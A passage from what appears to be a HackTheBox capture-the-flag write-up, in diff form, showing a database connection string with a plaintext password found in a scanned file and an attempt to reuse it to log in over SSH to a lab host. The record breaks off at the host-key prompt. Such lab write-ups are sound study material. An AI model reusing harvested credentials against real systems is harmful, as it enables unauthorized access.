Totes5706/HackTheBox/README.md

 </body>
 </html>
 ```
+Scanning the file, we notice an interesting line:
 ```
 "host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!")
 ```
+We can try to use these credentials to log into SSH:

 ```
 └─$ ssh postgres@10.129.187.99

 The authenticity of host '10.129.187.99 (10.129.187.99)' can't be established.
 ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
 This key is not known by any other names